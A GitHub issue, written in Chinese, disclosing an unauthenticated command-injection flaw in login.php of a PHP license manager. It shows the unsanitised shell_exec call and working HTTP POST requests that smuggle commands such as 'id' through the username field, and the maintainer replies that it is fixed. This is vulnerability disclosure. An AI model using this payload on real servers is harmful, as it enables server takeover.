### ISSUE TITLE
login.php 文件中的 远程命令执行漏洞

### ISSUE THREAD

**Issue by yuxianzi** [zcrdhm/dango-license-manager#1]
### 漏洞触发条件
- 无需认证
### 漏洞位置
Location: https://github.com/zcrdhm/dango-license-manager/blob/master/login.php#L40

### 漏洞详情

Code:
```
....
if (isset($_POST['login'])) {
 $username = trim($_POST['username']);
 $password = md5(trim($_POST['password']));
 $realpassword=trim(shell_exec("cat users/".$username));
....
```
程序对用户提交的username值未做任何过滤，被直接代入shell_exec("cat users/".$username)中导致产生命令执行漏洞，可直接接管服务器权限

构造恶意数据包，可直接执行命令
```
POST /login.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 71

username=admin|shell命令&password=11111&login=Login
```

执行id命令
```
POST /login.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 71

username=admin|id&password=11111&login=Login
```
id命令执行成功
![image](https://user-images.githubusercontent.com/41229220/145563473-96edc96e-3f30-4180-aa71-b9bf506a776d.png)

**Comment by zcrdhm** [comment]
我已在gitee仓库修复了这个问题，感谢您的check。。 
但是目前我还不知道如何同步到github这里。。。。
